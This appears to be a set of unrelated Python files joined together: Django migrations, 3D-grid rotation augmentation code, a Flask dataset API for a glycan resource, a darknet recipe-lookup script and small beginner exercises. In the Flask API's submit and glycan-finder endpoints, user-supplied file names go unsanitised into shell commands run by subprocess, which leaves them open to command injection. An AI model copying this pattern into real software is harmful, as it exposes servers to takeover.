fh = open(sys.argv[4], 'w')
fh.write(data.replace(sys.argv[1], sys.argv[2]))
fh.close()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2017-11-15 20:56
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('blog', '0003_post_image'),
]
operations = [
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('email', models.EmailField(max_length=254)),
('phone', models.CharField(max_length=13, null=True)),
('message', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
],
),
migrations.RemoveField(
model_name='comment',
name='post',
),
migrations.AddField(
model_name='post',
name='subtitle',
field=models.CharField(default='subtitle', max_length=200),
preserve_default=False,
),
migrations.AlterField(
model_name='post',
name='image',
field=models.FileField(default='images/tree.png', upload_to='images/'),
),
migrations.DeleteModel(
name='Comment',
),
]
|
# Generated by Django 3.1.1 on 2020-09-27 13:09
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('scrapingApp', '0008_auto_20200927_1604'),
]
operations = [
migrations.AlterModelTable(
name='parliament1',
table='Parliament1',
),
]
|
import math
import random
import numpy as np
import scipy.ndimage
import torch
from typing import List
# Generating more training data by data augmentation
# N.B. explicit define the data type
# TODO: add them to another math subfolder
def isRotationMatrix(R) :
Rt = np.transpose(R)
shouldBeIdentity = np.dot(Rt, R)
I = np.identity(3, dtype = R.dtype)
n = np.linalg.norm(I - shouldBeIdentity)
return n < 1e-6
# rotation matrix to euler angles (unit: rad)
def rot2eul(R):
assert(isRotationMatrix(R))
sy = math.sqrt(R[0,0] * R[0,0] + R[1,0] * R[1,0])
singular = sy < 1e-4
if not singular :
x = math.atan2(R[2,1] , R[2,2])
y = math.atan2(-R[2,0], sy)
z = math.atan2(R[1,0], R[0,0])
else :
x = math.atan2(-R[1,2], R[1,1])
y = math.atan2(-R[2,0], sy)
z = 0
return np.array([x, y, z])
# euler angles (unit: rad) to rotation matrix
def eul2rot(theta) :
R = np.array([[np.cos(theta[1])*np.cos(theta[2]), np.sin(theta[0])*np.sin(theta[1])*np.cos(theta[2]) - np.sin(theta[2])*np.cos(theta[0]), np.sin(theta[1])*np.cos(theta[0])*np.cos(theta[2]) + np.sin(theta[0])*np.sin(theta[2])],
[np.sin(theta[2])*np.cos(theta[1]), np.sin(theta[0])*np.sin(theta[1])*np.sin(theta[2]) + np.cos(theta[0])*np.cos(theta[2]), np.sin(theta[1])*np.sin(theta[2])*np.cos(theta[0]) - np.sin(theta[0])*np.cos(theta[2])],
[-np.sin(theta[1]), np.sin(theta[0])*np.cos(theta[1]), np.cos(theta[0])*np.cos(theta[1])]])
return R
def flip_rotmat (mat: np.array) -> np.array:
fliped_mat = mat
fliped_mat[0, 1] = mat[0, 2]
fliped_mat[0, 2] = mat[0, 1]
fliped_mat[1, 0] = - mat[2, 0]
fliped_mat[1, 1] = - mat[2, 2]
fliped_mat[1, 2] = - mat[2, 1]
fliped_mat[2, 0] = mat[1, 0]
fliped_mat[2, 1] = mat[1, 2]
fliped_mat[2, 2] = mat[1, 1]
return fliped_mat
# generating random number
# 0,1,2,3 (axis)
def random_rotation() -> int:
return np.random.randint(0, 4)
# example -180 - 179
def random_degree(angle_min: int, angle_max: int) -> int:
return np.random.randint(angle_min, angle_max)
# 0 - 2pi
def random_angle() -> float:
return np.random.random() * 2 * math.pi
# [-4,4],[-4,4],[-4,4]
def random_jitter(max_jitter: int = 4) -> List[int]:
jitter = [np.random.randint(-max_jitter, max_jitter) for _ in range(3)]
return jitter
# rotate around y axis (why y axis)
def get_rotations_y(angles: np.array) -> np.array:
cos_angle = np.cos(angles)
sin_angle = np.sin(angles)
rots = np.eye(3)[np.newaxis, :]
rots = np.tile(rots, [angles.shape[0], 1, 1])
rots[:, 0, 0] = cos_angle
rots[:, 0, 2] = sin_angle
rots[:, 2, 0] = -sin_angle
rots[:, 2, 2] = cos_angle
return rots.astype(np.float32)
# z aixs is the first dimension (take care that now the dimension sequence is z,y,x)
def get_rotations_z(angles: np.array) -> np.array:
cos_angle = np.cos(angles)
sin_angle = np.sin(angles)
rots = np.eye(3)[np.newaxis, :]
rots = np.tile(rots, [angles.shape[0], 1, 1])
rots[:, 1, 1] = cos_angle
rots[:, 1, 2] = sin_angle
rots[:, 2, 1] = -sin_angle
rots[:, 2, 2] = cos_angle
return rots.astype(np.float32)
def get_rotations_from_mat(mat: np.array, count) -> np.array:
rots = mat[np.newaxis, :]
rots = np.tile(rots, [count, 1, 1])
return rots.astype(np.float32)
def rotation_augmentation_fixed(grid: np.array, num_rotations=None) -> np.array:
if num_rotations is None:
angle = np.random.randint(0, 4)
else:
angle = num_rotations
grid = np.rot90(grid, k=angle, axes=(1, 3))
return grid
def rotate_grid(grid: np.array, num_rotations: int) -> np.array:
patch = np.rot90(grid, k=num_rotations, axes=(1, 3))
return patch
# used, figure out why this works (unit: degree)
# take the scan as the target, align models to the scan
def rotation_augmentation_interpolation_v3(grid: np.array, key: str, aug_rotation_z = None, pre_rot_mat = np.eye(3),
random_for_neg = False, pertub_for_pos = True, pertub_deg_max: int = 15) -> np.array:
# TODO: figure out which is better: rotate negative cad with the same angle or not (trun on/off by setting the argument random_for_neg)
# False is better because we'd like to have harder negative samples
if key == "positive" and pertub_for_pos: # also add this line for v5
angle = aug_rotation_z + random_degree(-pertub_deg_max, pertub_deg_max) # unit: degree, -15 - 15
elif key == "negative" and random_for_neg:
angle = random_degree(0, 359) # unit: degree, 0 - 359
else:
angle = aug_rotation_z # unit: degree (the augmentation random rotation)
euler_angle = rot2eul(pre_rot_mat) * 180.0 / math.pi # unit: degree (the alignment rotation)
model_to_align = ["cad", "negative", "positive"]
if key in model_to_align:
#print("apply additional rotation:", angle*180/math.pi, euler_angle[2]*180/math.pi)
angle = angle + 180.0 - euler_angle[2] # unit: degree
if angle != 0:
grid = scipy.ndimage.rotate(grid, angle, (2, 3), False, prefilter=True, order=3, cval=0, mode="nearest") # rotate in x-y plane, unit: degree
interpolate_thre = 0.5 # TODO: figure out what's the suitable value and the principle of the grid interpolation
grid[grid<interpolate_thre] = 0
return grid
# take the model as the target, align scan to the model at the canonical coordinate system
def rotation_augmentation_interpolation_v5(grid: np.array, key: str, aug_rotation_z = None, pre_rot_mat = np.eye(3), random_for_neg = False, pertub_for_pos = True) -> np.array:
angle = aug_rotation_z # unit: degree (the augmentation random rotation)
euler_angle = rot2eul(pre_rot_mat) * 180.0 / math.pi # unit: degree (the alignment rotation)
model_to_align = ["scan", "mask"]
if key in model_to_align:
#print("apply additional rotation:", angle*180/math.pi, euler_angle[2]*180/math.pi)
angle = angle - 180.0 + euler_angle[2] # unit: degree
grid = scipy.ndimage.rotate(grid, angle, (2, 3), False, prefilter=True, order=3, cval=0, mode="nearest") # rotate in x-y plane, unit: degree
# interpolate_thre = 0.5 # TODO: figure out what's the suitable value and the principle of the grid interpolation
# grid[grid<interpolate_thre] = 0
return grid
# figure out why this does not work
def rotation_augmentation_interpolation_v4(grid: np.array, key: str, aug_rotation_z = None, pre_rot_mat = np.eye(3)) -> np.array:
if aug_rotation_z is None:
aug_rotation_z = random_angle()
scans = torch.from_numpy(np.expand_dims(grid, axis=0))
num = scans.shape[0]
# print(aug_rotation_z)
#rots = np.asarray([aug_rotation_z])
rots = np.asarray([0.0])
#rotations_y = torch.from_numpy(get_rotations_y(rots))
aug_rot_mat = get_rotations_z(rots)
total_rot = aug_rot_mat.dot(pre_rot_mat)
model_to_rot = ["cad", "negative"]
if key in model_to_rot:
rot_mat = torch.from_numpy(total_rot).float()
#rot_mat = torch.from_numpy(get_rotations_from_mat(pre_rot_mat.astype(np.float32),rots.shape[0]))
#print(pre_rot_mat)
else:
rot_mat = torch.from_numpy(aug_rot_mat).float()
# apply rotation and keep the voxel's structure
max_size = np.array(scans.shape[2:], dtype=np.int32)
center = (max_size - 1).astype(np.float32) * 0.5
center = np.tile(center.reshape(3, 1), [1, max_size[0] * max_size[1] * max_size[2]])
grid_coords = np.array(
np.unravel_index(np.arange(max_size[0] * max_size[1] * max_size[2]), [max_size[0], max_size[1], max_size[2]]),
dtype=np.float32) - center
grid_coords = np.tile(grid_coords[np.newaxis, :], [num, 1, 1])
# get grid coordinates (decentralized) before rotation
grid_coords = torch.from_numpy(grid_coords)
center = torch.from_numpy(center).unsqueeze(0).repeat(scans.shape[0], 1, 1)
#grid_coords = torch.bmm(rotations_y, grid_coords) + center
grid_coords = torch.bmm(rot_mat, grid_coords) + center
grid_coords = torch.clamp(grid_coords, 0, max_size[0] - 1).long()
grid_coords = grid_coords[:, 0] * max_size[1] * max_size[2] + grid_coords[:, 1] * max_size[2] + grid_coords[:, 2]
mult = torch.arange(num).view(-1, 1) * max_size[0] * max_size[1] * max_size[2]
grid_coords = grid_coords + mult
grid_coords = grid_coords.long()
scan_rots = scans.permute(0, 2, 3, 4, 1).contiguous().view(-1, 1)[grid_coords]
scan_rots = scan_rots.view(scans.shape[0], scans.shape[2], scans.shape[3], scans.shape[4], scans.shape[1]).permute(
0, 4, 1, 2, 3)
scan_rots = scan_rots.numpy()
return scan_rots[0]
def rotation_augmentation_interpolation_v2(grid: np.array, rotation=None) -> np.array:
if rotation is None:
rotation = random_angle()
scans = torch.from_numpy(np.expand_dims(grid, axis=0))
num = scans.shape[0]
rots = np.asarray([rotation])
#rotations_y = torch.from_numpy(get_rotations_y(rots))
rotations_z = torch.from_numpy(get_rotations_z(rots))
max_size = np.array(scans.shape[2:], dtype=np.int32)
center = (max_size - 1).astype(np.float32) * 0.5
center = np.tile(center.reshape(3, 1), [1, max_size[0] * max_size[1] * max_size[2]])
grid_coords = np.array(
np.unravel_index(np.arange(max_size[0] * max_size[1] * max_size[2]), [max_size[0], max_size[1], max_size[2]]),
dtype=np.float32) - center
grid_coords = np.tile(grid_coords[np.newaxis, :], [num, 1, 1])
grid_coords = torch.from_numpy(grid_coords)
center = torch.from_numpy(center).unsqueeze(0).repeat(scans.shape[0], 1, 1)
#grid_coords = torch.bmm(rotations_y, grid_coords) + center
grid_coords = torch.bmm(rotations_z, grid_coords) + center
grid_coords = torch.clamp(grid_coords, 0, max_size[0] - 1).long()
grid_coords = grid_coords[:, 0] * max_size[1] * max_size[2] + grid_coords[:, 1] * max_size[2] + grid_coords[:, 2]
mult = torch.arange(num).view(-1, 1) * max_size[0] * max_size[1] * max_size[2]
grid_coords = grid_coords + mult
grid_coords = grid_coords.long()
scan_rots = scans.permute(0, 2, 3, 4, 1).contiguous().view(-1, 1)[grid_coords]
scan_rots = scan_rots.view(scans.shape[0], scans.shape[2], scans.shape[3], scans.shape[4], scans.shape[1]).permute(
0, 4, 1, 2, 3)
scan_rots = scan_rots.numpy()
return scan_rots[0]
def rotation_augmentation_interpolation(grid: np.array, rotation=None) -> np.array:
if rotation is None:
angle = random_degree()
else:
angle = rotation
grid = scipy.ndimage.rotate(grid, angle, (1, 3), False, prefilter=True, order=3, cval=0, mode="nearest")
return grid
def flip_augmentation(grid: np.array, flip=None) -> np.array:
if flip is None:
chance = random.random() < 0.5
else:
chance = flip
if chance:
grid = np.flip(grid, (1, 3))
return grid
def jitter_augmentation(grid: np.array, jitter=None) -> np.array:
if jitter is None:
jitter = random_jitter()
start = [max(0, j) for j in jitter]
end = [max(0, -j) for j in jitter]
pad = np.pad(grid, ((0, 0),
(start[0], end[0]),
(start[1], end[1]),
(start[2], end[2])), "constant", constant_values=(0, 0))
offset_start = [max(0, -j) for j in jitter]
offset_end = [None if max(0, j) == 0 else -j for j in jitter]
grid = pad[:, offset_start[0]:offset_end[0], offset_start[1]:offset_end[1], offset_start[2]:offset_end[2]]
return grid
|
import os,sys
from flask_restx import Namespace, Resource, fields
from flask import (request, current_app)
from glyds.document import get_one, get_many, get_many_text_search, get_ver_list, order_json_obj
from werkzeug.utils import secure_filename
from glyds.qc import run_qc
import datetime
import time
import subprocess
import json
import pytz
import hashlib
from glyds.db import get_mongodb
api = Namespace("dataset", description="Dataset APIs")
dataset_getall_query_model = api.model(
'Dataset Get All Query',
{
}
)
dataset_search_query_model = api.model(
'Dataset Search Query',
{
'query': fields.String(required=True, default="", description='Query string')
}
)
dataset_list_query_model = api.model(
'Dataset List Query',
{
'list_id': fields.String(required=True, default="", description='List ID string')
}
)
dataset_historylist_query_model = api.model(
'Dataset History List Query',
{
'query': fields.String(required=True, default="", description='Query string')
}
)
dataset_detail_query_model = api.model(
'Dataset Detail Query',
{
'bcoid': fields.String(required=True, default="GLY_000001", description='BCO ID'),
'dataversion': fields.String(required=False, default="1.12.1", description='Dataset Release [e.g: 1.12.1]'),
}
)
dataset_upload_query_model = api.model(
'Dataset Upload Query',
{
"format":fields.String(required=True, default="", description='File Format [csv/tsv]'),
"qctype":fields.String(required=True, default="", description='QC Type [basic/single_glyco_site]'),
"dataversion":fields.String(required=True, default="", description='Data Release [e.g: 1.12.1]')
}
)
dataset_submit_query_model = api.model(
'Dataset Submit Query',
{
'fname': fields.String(required=True, default="", description='First name'),
'lname': fields.String(required=True, default="", description='Last name'),
'email': fields.String(required=True, default="", description='Email address'),
'affilation': fields.String(required=True, default="", description='Affilation')
}
)
glycan_finder_query_model = api.model(
'Glycan Finder Query',
{
'filename': fields.String(required=True, default="", description='File name')
}
)
dataset_historydetail_query_model = api.model(
'Dataset History Detail Query',
{
'bcoid': fields.String(required=True, default="GLY_000001", description='BCO ID')
}
)
pagecn_query_model = api.model(
'Dataset Page Query',
{
'pageid': fields.String(required=True, default="faq", description='Page ID')
}
)
init_query_model = api.model(
'Init Query',
{
}
)
ds_model = api.model('Dataset', {
'id': fields.String(readonly=True, description='Unique dataset identifier'),
'title': fields.String(required=True, description='Dataset title')
})
@api.route('/getall')
class DatasetGetAll(Resource):
'''f dfdsfadsfas f '''
@api.doc('getall_datasets')
@api.expect(dataset_getall_query_model)
def post(self):
'''Get all datasets'''
req_obj = request.json
res_obj = {"recordlist":[]}
r_one = get_many({"coll":"c_extract", "query":""})
if "error" in r_one:
return r_one
res_obj["recordlist"] = r_one["recordlist"]
n = len(res_obj["recordlist"])
res_obj["stats"] = {"total":n, "retrieved":n}
return res_obj
@api.route('/search')
class DatasetSearch(Resource):
'''f dfdsfadsfas f '''
@api.doc('search_datasets')
@api.expect(dataset_search_query_model)
#@api.marshal_list_with(ds_model)
def post(self):
'''Search datasets'''
req_obj = request.json
mongo_dbh, error_obj = get_mongodb()
if error_obj != {}:
return error_obj
hash_str = json.dumps(req_obj)
hash_obj = hashlib.md5(hash_str.encode('utf-8'))
list_id = hash_obj.hexdigest()
coll_names = mongo_dbh.collection_names()
if "c_cache" in coll_names:
res = get_one({"coll":"c_cache", "list_id":list_id})
if "error" not in res:
if "record" in res:
return {"list_id":list_id}
res_obj = {"recordlist":[]}
r_one = get_many({"coll":"c_extract", "query":""})
if "error" in r_one:
return r_one
bco_dict = {}
for obj in r_one["recordlist"]:
bco_dict[obj["bcoid"]] = {"filename":obj["filename"],"categories":obj["categories"],
"title":obj["title"]
}
if req_obj["query"] == "":
res_obj["recordlist"] = r_one["recordlist"]
else:
#dataset body search
req_obj["coll"] = "c_records"
r_two = get_many_text_search(req_obj)
if "error" in r_two:
return r_two
out_dict = {}
for obj in r_two["recordlist"]:
prefix, bco_idx, file_idx, row_idx = obj["recordid"].split("_")
bco_id = prefix + "_" + bco_idx
if bco_id not in bco_dict:
continue
bco_title, file_name = bco_dict[bco_id]["title"], bco_dict[bco_id]["filename"]
o = {
"recordid":obj["recordid"],
"bcoid":bco_id, "fileidx":file_idx,
"filename":file_name, "title":bco_title,
"categories":bco_dict[bco_id]["categories"],
"rowlist":[]
}
if bco_id not in out_dict:
out_dict[bco_id] = o
out_dict[bco_id]["rowlist"].append(int(row_idx))
for bco_id in sorted(out_dict):
res_obj["recordlist"].append(out_dict[bco_id])
#dataset metadata search
seen = {}
req_obj["coll"] = "c_bco"
r_three = get_many_text_search(req_obj)
if "error" in r_three:
return r_three
r_four = get_many(req_obj)
if "error" in r_four:
return r_four
for doc in r_three["recordlist"] + r_four["recordlist"] :
if "object_id" in doc:
bco_id = doc["object_id"].split("/")[-2]
seen[bco_id] = True
for doc in r_one["recordlist"]:
if doc["bcoid"] in seen and doc["bcoid"] not in out_dict:
res_obj["recordlist"].append(doc)
n = len(res_obj["recordlist"])
res_obj["stats"] = {"total":n, "retrieved":n}
if n != 0:
ts_format = "%Y-%m-%d %H:%M:%S %Z%z"
ts = datetime.datetime.now(pytz.timezone('US/Eastern')).strftime(ts_format)
cache_info = { "reqobj":req_obj, "ts":ts}
cache_obj = { "list_id":list_id, "cache_info":cache_info, "results":res_obj}
cache_coll = "c_cache"
res = mongo_dbh[cache_coll].insert_one(cache_obj)
res_obj = {"list_id":list_id}
return res_obj
@api.route('/list')
class DatasetList(Resource):
'''Get search results'''
@api.doc('get_dataset')
@api.expect(dataset_list_query_model)
#@api.marshal_with(ds_model)
def post(self):
'''Get search results'''
req_obj = request.json
req_obj["coll"] = "c_cache"
res = get_one(req_obj)
if "error" in res:
return res
res_obj = {
"status":1,
"recordlist":res["record"]["results"]["recordlist"],
"stats":res["record"]["results"]["stats"],
"searchquery":res["record"]["cache_info"]["reqobj"]["query"]
}
return res_obj
@api.route('/detail')
class DatasetDetail(Resource):
'''Show a single dataset item'''
@api.doc('get_dataset')
@api.expect(dataset_detail_query_model)
#@api.marshal_with(ds_model)
def post(self):
'''Get single dataset object'''
req_obj = request.json
ver_list = get_ver_list(req_obj["bcoid"])
req_obj["coll"] = "c_extract"
extract_obj = get_one(req_obj)
if "error" in extract_obj:
return extract_obj
res = get_many_text_search({"coll":"c_records", "query":req_obj["bcoid"]})
row_list_one, row_list_two = [], []
limit_one, limit_two = 1000, 1000
row_count_one, row_count_two = 0, 0
req_obj["rowlist"] = [] if "rowlist" not in req_obj else req_obj["rowlist"]
for obj in res["recordlist"]:
row_idx = int(obj["recordid"].split("_")[-1])
row = json.loads(obj["row"])
if row_idx in req_obj["rowlist"] and row_count_one < limit_one:
row_list_one.append(row)
row_count_one += 1
elif row_count_two < limit_two:
row_list_two.append(row)
row_count_two += 1
if row_count_one > limit_one and row_count_two > limit_two:
break
if extract_obj["record"]["sampledata"]["type"] == "table":
header_row = []
for obj in extract_obj["record"]["sampledata"]["data"][0]:
header_row.append(obj["label"])
extract_obj["record"]["alldata"] = {"type":"table", "data":[]}
extract_obj["record"]["resultdata"] = {"type":"table", "data":[]}
extract_obj["record"]["resultdata"]["data"].append(header_row)
extract_obj["record"]["alldata"]["data"].append(header_row)
extract_obj["record"]["resultdata"]["data"] += row_list_one
extract_obj["record"]["alldata"]["data"] += row_list_two
elif extract_obj["record"]["filetype"] in ["gz"]:
extract_obj["record"]["alldata"] = {"type":"html", "data":"<pre>"}
extract_obj["record"]["resultdata"] = {"type":"html", "data":"<pre>"}
r_list_one, r_list_two = [], []
for row in row_list_one:
r_list_one.append("\n"+row[0])
for row in row_list_two:
r_list_two.append("\n"+row[0])
extract_obj["record"]["resultdata"]["data"] = "\n".join(r_list_one)
extract_obj["record"]["alldata"]["data"] = "\n".join(r_list_two)
elif extract_obj["record"]["sampledata"]["type"] in ["html"]:
extract_obj["record"]["alldata"] = {"type":"html", "data":"<pre>"}
extract_obj["record"]["resultdata"] = {"type":"html", "data":"<pre>"}
r_list_one, r_list_two = [], []
for row in row_list_one:
r_list_one.append("\n>"+row[-1]+"\n"+row[0])
for row in row_list_two:
r_list_two.append("\n>"+row[-1]+"\n"+row[0])
extract_obj["record"]["resultdata"]["data"] = "\n".join(r_list_one)
extract_obj["record"]["alldata"]["data"] = "\n".join(r_list_two)
elif extract_obj["record"]["sampledata"]["type"] in ["text"]:
extract_obj["record"]["alldata"] = {"type":"html", "data":"<pre>"}
extract_obj["record"]["resultdata"] = {"type":"html", "data":"<pre>"}
r_list_one, r_list_two = [], []
for row in row_list_one:
r_list_one.append(row[0])
for row in row_list_two:
r_list_two.append(row[0])
extract_obj["record"]["resultdata"]["data"] = "\n".join(r_list_one)
extract_obj["record"]["alldata"]["data"] = "\n".join(r_list_two)
extract_obj["record"].pop("sampledata")
req_obj["coll"] = "c_history"
req_obj["doctype"] = "track"
history_obj = get_one(req_obj)
if "error" in history_obj:
return history_obj
history_dict = {}
for ver in history_obj["record"]["history"]:
if ver in ver_list:
history_dict[ver] = history_obj["record"]["history"][ver]
req_obj["coll"] = "c_bco"
req_obj["bcoid"] = "https://biocomputeobject.org/%s" % (req_obj["bcoid"])
bco_obj = get_one(req_obj)
if "error" in bco_obj:
return bco_obj
SITE_ROOT = os.path.realpath(os.path.dirname(__file__))
json_url = os.path.join(SITE_ROOT, "conf/config.json")
config_obj = json.load(open(json_url))
#return list(bco_obj["record"].keys())
bco_obj["record"] = order_json_obj(bco_obj["record"], config_obj["bco_field_order"])
#return list(bco_obj["record"].keys())
res_obj = {
"status":1,
"record":{
"extract":extract_obj["record"],
"bco":bco_obj["record"],
"history":history_dict
}
}
return res_obj
@api.route('/pagecn')
class Dataset(Resource):
'''Get static page content '''
@api.doc('get_dataset')
@api.expect(pagecn_query_model)
#@api.marshal_with(ds_model)
def post(self):
'''Get static page content '''
req_obj = request.json
req_obj["coll"] = "c_html"
res_obj = get_one(req_obj)
return res_obj
@api.route('/historylist')
class HistoryList(Resource):
'''Get dataset history list '''
@api.doc('historylist')
@api.expect(dataset_historylist_query_model)
#@api.marshal_list_with(ds_model)
def post(self):
'''Get dataset history list '''
req_obj = request.json
req_obj["coll"] = "c_history"
req_obj["query"] = "" if "query" not in req_obj else req_obj["query"]
hist_obj = get_many(req_obj)
if "error" in hist_obj:
return hist_obj
res_obj = {"tabledata":{"type": "table","data": []}}
header_row = [
{"type": "string", "label": "BCOID"}
,{"type": "string", "label": "File Name"}
,{"type": "number", "label": "Field Count"}
,{"type": "number", "label": "Fields Added"}
,{"type": "number", "label": "Fields Removed"}
,{"type": "number", "label": "Row Count"}
,{"type": "number", "label": "Rows Count Prev"}
,{"type": "number", "label": "Rows Count Change"}
,{"type": "number", "label": "ID Count"}
,{"type": "number", "label": "IDs Added"}
,{"type": "number", "label": "IDs Removed"}
,{"type": "string", "label": ""}
]
f_list = ["file_name",
"field_count", "fields_added", "fields_removed",
"row_count", "row_count_last", "row_count_change",
"id_count", "ids_added", "ids_removed"
]
res_obj["tabledata"]["data"].append(header_row)
for obj in hist_obj["recordlist"]:
if "history" in obj:
ver_one = req_obj["dataversion"]
ver_two = ver_one.replace(".", "_")
if ver_two in obj["history"]:
row = [obj["bcoid"]]
for f in f_list:
row.append(obj["history"][ver_two][f])
row.append("<a href=\"/%s/%s/history\">details</a>" % (obj["bcoid"],ver_one))
match_flag = True
idx_list = []
if req_obj["query"] != "":
q = req_obj["query"].lower()
for v in [row[0].lower(), row[1].lower()]:
idx_list.append(v.find(q))
match_flag = False if idx_list == [-1,-1] else match_flag
if match_flag == True:
res_obj["tabledata"]["data"].append(row)
return res_obj
@api.route('/historydetail')
class HistoryDetail(Resource):
'''Show a single dataset history object'''
@api.doc('get_dataset')
@api.expect(dataset_historydetail_query_model)
#@api.marshal_with(ds_model)
def post(self):
'''Get single dataset history object'''
req_obj = request.json
req_obj["coll"] = "c_history"
res_obj = get_one(req_obj)
if "error" in res_obj:
return res_obj
res_obj["record"]["history"] = res_obj["record"]["history"][req_obj["dataversion"].replace(".","_")]
return res_obj
@api.route('/init')
class Dataset(Resource):
'''Get init '''
@api.doc('get_dataset')
@api.expect(init_query_model)
def post(self):
'''Get init '''
#req_obj = request.json
req_obj = {}
req_obj["coll"] = "c_init"
res_obj = get_one(req_obj)
return res_obj
@api.route('/upload', methods=['GET', 'POST'])
class DatasetUpload(Resource):
'''Upload dataset item'''
@api.doc('upload_dataset')
@api.expect(dataset_upload_query_model)
#@api.marshal_with(ds_model)
def post(self):
'''Upload dataset'''
res_obj = {}
req_obj = request.form
error_obj = {}
if request.method != 'POST':
error_obj = {"error":"only POST requests are accepted"}
elif 'userfile' not in request.files and 'file' not in request.files:
error_obj = {"error":"no file parameter given"}
else:
file = request.files['userfile'] if "userfile" in request.files else request.files['file']
file_format = req_obj["format"]
qc_type = req_obj["qctype"]
data_version = req_obj["dataversion"]
file_data = []
if file.filename == '':
error_obj = {"error":"no filename given"}
else:
file_name = secure_filename(file.filename)
data_path, ser = os.environ["DATA_PATH"], os.environ["SERVER"]
out_file = "%s/userdata/%s/tmp/%s" % (data_path, ser, file_name)
file.save(out_file)
res_obj = {
"inputinfo":{"name":file_name, "format":file_format},
"summary":{"fatal_qc_flags":0, "total_qc_flags":0},
"failedrows":[]
}
error_obj = run_qc(out_file, file_format, res_obj, qc_type, data_version)
res_obj = error_obj if error_obj != {} else res_obj
return res_obj
@api.route('/submit')
class Dataset(Resource):
'''Submit dataset '''
@api.doc('get_dataset')
@api.expect(dataset_submit_query_model)
def post(self):
'''Submit dataset '''
req_obj = request.json
data_path, ser = os.environ["DATA_PATH"], os.environ["SERVER"]
src_file = "%s/userdata/%s/tmp/%s" % (data_path, ser, req_obj["filename"])
dst_dir = "%s/userdata/%s/%s" % (data_path, ser, req_obj["affilation"])
if os.path.isfile(src_file) == False:
res_obj = {"error":"submitted filename does not exist!", "status":0}
else:
if os.path.isdir(dst_dir) == False:
dst_dir = "%s/userdata/%s/%s" % (data_path, ser, "other")
today = datetime.datetime.today()
yy, mm, dd = today.year, today.month, today.day
dst_file = "%s/%s_%s_%s_%s" % (dst_dir, mm, dd, yy, req_obj["filename"])
json_file = ".".join(dst_file.split(".")[:-1]) + ".json"
cmd = "cp %s %s" % (src_file, dst_file)
x, y = subprocess.getstatusoutput(cmd)
if os.path.isfile(dst_file) == False:
res_obj = {"error":"save file failed!", "status":0}
else:
res_obj = {"confirmation":"Dataset file has been submitted successfully!", "status":1}
with open(json_file, "w") as FW:
FW.write("%s\n" % (json.dumps(req_obj, indent=4)))
return res_obj
@api.route('/glycan_finder')
class Dataset(Resource):
'''Glycan Finder '''
@api.doc('get_dataset')
@api.expect(glycan_finder_query_model)
def post(self):
'''Glyca Finder '''
req_obj = request.json
data_path, ser = os.environ["DATA_PATH"], os.environ["SERVER"]
uploaded_file = "%s/userdata/%s/tmp/%s" % (data_path, ser, req_obj["filename"])
output_file = "%s/userdata/%s/tmp/%s_output_%s.txt" % (data_path, ser, req_obj["filename"], os.getpid())
if os.path.isfile(uploaded_file) == False:
res_obj = {"error":"submitted filename does not exist!", "status":0}
else:
file_format = req_obj["filename"].split(".")[-1]
cmd = "sh /hostpipe/glycan_finder.sh %s %s" % (uploaded_file, output_file)
glycan_list = []
if ser != "dev":
glycan_list = subprocess.getoutput(cmd).strip().split(",")
else:
glycan_list = ["A", "B"]
time.sleep(5)
res_obj = {
"inputinfo":{"name":req_obj["filename"], "format":file_format},
"mappingrows":[
[
{"type": "string", "label": "GlyToucan Accession"},
{"type": "string", "label": "Glycan Image"}
]
]
}
for ac in glycan_list:
link_one = "<a href=\"https://glygen.org/glycan/%s\" target=_>%s</a>" % (ac,ac)
link_two = "<a href=\"https://gnome.glyomics.org/restrictions/GlyGen.StructureBrowser.html?focus=%s\" target=_>related glycans</a>" % (ac)
img = "<img src=\"https://api.glygen.org/glycan/image/%s\">" % (ac)
links = "%s (other %s)" % (link_one, link_two)
res_obj["mappingrows"].append([links, img])
return res_obj
|
from gerenciar_avaliacoes import * |
import pickle
import json
import subprocess
reverse_index = pickle.load(open("reverse_index.pickle", "rb"))
f1 = open("detect.txt", "r")
f2 = open("result.txt", "w")
subprocess.run(["./darknet", "detector", "test", "../data_for_local/obj.data",
"../data_for_local/obj.cfg", "../obj_2000.weights", "-i", "0", "-thresh", "0.1"],
cwd="darknet", stdin = f1, stdout = f2)
# darknet detector test data_for_local/obj.data data_for_local/obj.cfg obj_2000.weights -i 0 -thresh 0.3 < detect.txt > result.txt
f = open("result.txt", "r")
predictions = f.readlines()
query = set()
for prediction in predictions:
if not prediction.startswith("Enter Image Path:"):
ans = prediction[:prediction.index(':')]
query.add(ans)
query = list(query)
result = set(reverse_index[query[0]])
for i in query:
result = result & set(reverse_index[i])
food_data = json.load(open("food_db.json", "r"))
answer = []
hash_ = set()
for r in result:
for dish in food_data:
if r == dish['dish_id'] and dish['url'] not in hash_:
answer.append({'dish_name':dish['dish_name'], 'link' : dish['url'], 'ingredients' : dish['ingredients']})
hash_.add(dish['url'])
print()
print("DETECTED", query)
print()
print(f"SHOWING {len(answer)} RECIPES")
print("-" * 40)
print()
for i in answer:
print("DISH NAME", i['dish_name'])
print("LINK", i['link'])
print("=" * 40) |
####part 1
import turtle
# turtle.color("blue","red") #forca barca
# turtle.fill(True)
# turtle.pendown()
# turtle.goto(0,0)
# turtle.goto(100,100)
# ###part 2
# turtle.goto(0,200)
# turtle.goto(-100,100)
# turtle.goto(0,0)
###part 3
# turtle.fill(False)
####part 4
turtle.penup()
turtle.setposition(-60,60)
turtle.pendown()
turtle.color("blue")
turtle.circle(50)
turtle.penup()
turtle.color("yellow")
turtle.setposition(0,0)
turtle.pendown()
turtle.circle(50)
turtle.penup()
turtle.color("black")
turtle.setposition(60,60)
turtle.pendown()
turtle.circle(50)
turtle.penup()
turtle.color("green")
turtle.setposition(120,0)
turtle.pendown()
turtle.circle(50)
turtle.penup()
turtle.color("red")
turtle.setposition(180,60)
turtle.pendown()
turtle.circle(50)
turtle.penup()
#woohooooo i did itttt
turtle.mainloop() |
termo = int(input('Digite o primeiro termo: '))
razao = int(input('Digite a razão: '))
termoMais = 1
c = 1
quantTermo = 10
while termoMais != 0:
while c < 11:
an = termo + (c-1)*razao
print(an , '-> ' if c < 10 else '', end='')
c += 1
print('pausa')
